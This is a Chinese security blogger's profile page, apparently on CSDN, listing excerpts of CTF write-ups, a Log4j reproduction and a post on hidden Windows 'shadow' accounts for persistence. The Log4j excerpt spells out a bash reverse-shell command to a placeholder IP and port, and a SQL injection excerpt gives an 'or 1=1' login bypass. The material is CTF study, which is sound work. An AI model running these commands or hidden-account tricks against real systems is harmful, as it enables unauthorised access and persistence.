自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+
  • 博客(11)
  • 收藏
  • 关注

原创 权限维持-Windows影子用户

在windows中创建一个影子用户,影子用户拥有和正常用户一样的权限和功能影子用户只可在注册表中看到演示环境:windows server 2012(靶机)前提:需要一个高权限用户(administrator 或者是 system)

2022-11-07 14:16:26 1523 1

原创 2022年强网杯rcefile wp

查看源码中config.inc.php,发现对cookie做了反序列化,并存在spl_autoload_register()函数。所以上传一个phar文件,并把Content-Type改成image/png。常见的大小写绕过,空格绕过,php4这种都可以绕过成功上传,但都不解析。cookie的userfile就是上传文件加密过的文件名来构造序列化。知道了flag的位置所以我们重新上传一个catflag的inc文件。带着构造的cookie进行访问可以看到代码被执行了。O32"文件名"0{}...

2022-08-01 17:28:08 1150 1

原创 2022蓝帽杯初赛wp

第六届”蓝帽杯“全国大学生网络安全技能大赛初赛

2022-07-10 18:22:14 804

原创 HSC-1th大赛 writeup

MISCSign-in关注公众号DORAEMON根据注释得知6位纯数字密码,直接爆破得到密码:376852解压zip得到图片,修改高度得到被遮住两个定位点的二维码ps修一下得到二维码,扫码即可汝闻,人言否文件尾有PK,只不过反过来变成KP了,一共有两处都反了改回来然后binwalk -e分离得到zipzip有密码,注释信息为: qazsedcftrfvgycft6yhntgbnytfvbhyik,.;p一时脑抽没看出这是键盘密码复现:在键盘

2022-02-21 14:01:19 3513

原创 BUUCTF 加固题 Ezsql wp

题目: 一. 漏洞在登录页面存在sql注入,可用万能密码进行登录用户名: admin' or 1=1#密码: 随便这道题就是加固这个登录页面的sql注入即可获取flag二. 加固根据给的地址和端口ssh连接目标机器,进入/var/www/html目录在此处新建一个phpinfo.php并写入语句<?php phpinfo(); ?>访问phpinfo.php可以看到当前php版本为7.3.18php中防止sql注入的函数无非就那么几个(我所知道

2022-02-04 15:35:28 3778

原创 2022HWS硬件安全冬令营 X DASCTF Jan部分wp

Miscgogogo 下载解压得到两个文件夹,一个是一堆拼图,一个是raw文件所以进行拼图和取证取证步骤上来先看imageinfopython2 vol.py -f 2.raw imageinfo看下桌面python2 vol.py -f 2.raw --profile=WinXPSP2x86 filescan | grep "桌面"发现有个zip文件,导出zip文件python2 vol.py -f 2.raw dumpfiles -Q 0x00000000..

2022-01-25 11:29:37 3483

原创 ctfshow Log4j复现wp

声明:该文章来自本人日常学习笔记,请勿利用文章内的相关技术从事非法测试,如因此产生的一切不良后果与本人无关JNDIExploit先将反弹shell的命令base64编码,然后将里面的+号和=号进行一次url编码注:IP填vps公网ip,PORT要和nc监听的端口对应bash -i >& /dev/tcp/IP/PORT 0>&1# => YmFzaCAtaSA+JiAvZGV2L3RjcC9JUC9QT1JUIDA+JjE=# => Ym

2022-01-14 16:04:50 2926

原创 长安“战疫”网络安全卫士守护赛部分writeup

解题过程题目一 八卦迷宫用画图工具手工连接,然后将路上的图表和字相对应按顺序打出,然后根据题目要求换成全拼,加上图片里的前缀cazy{}提交flag为:cazy{zhanchangyangchangzhanyanghechangshanshananzhanyiyizhanyianyichanganyang}题目二 西安加油用wireshark打开发现一个很大而且带有很多base64编码的流量追踪http流,复制去解base64,得到一个zip解压得

2022-01-08 21:37:15 1786

原创 ctfshow WEB入门 信息收集 1-20

web1题目:开发注释未及时删除查看页面源代码即可web2题目:js把鼠标右键和f12屏蔽了方法一:禁用JavaScript方法二:url前面加上view-source:web3题目:抓个包试试抓包在请求包发现flagweb4题目:总有人把后台地址写入robots访问robots.txt后得到后台地址,访问得到flagweb5题目:phps源码泄露访问index.phps下载源码拿到flagweb6题目:解压源码到当前目.

2021-12-09 17:32:15 2027

原创 第一届东软杯网络CTF竞赛-DNUICTF部分wp

MISC[签到]签到直接提交flag即可flag:flag{Dnui_ctf_2021_s1gn_in}[萌新]在哪呢ctrl+a全选发现有个空白的地方被选中了在kali打开选中,拿到flagflag:flag{hey_there_is_no_thing}只是个PNG,别想太多了.pngbinwalk命令查看png图片:binwalk -e PNG.png,发现flagflag:flag{zhe_ti_mu_ye_tai_bt_le_XD}

2021-12-06 19:58:57 3570

原创 2021年春秋杯网络安全联赛秋季赛 勇者山峰部分wp

1.签到题-CryptoVigenere根据题目Vigenere可看出是维吉尼亚密码使用在线网站破解https://guballa.de/vigenere-solverflag:53d613fc-6c5c-4dd6-b3ce-8bc867c6f6482.Mischelloshark一张图片010打开发现16进制有许多PK字样,对图片进行分离处理(foremost)果然隐藏了压缩包,但是压缩包设置了密码,提示密码在图片里猜测图片存在LSB隐写

2021-11-28 16:46:48 1100 2

空空如也

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除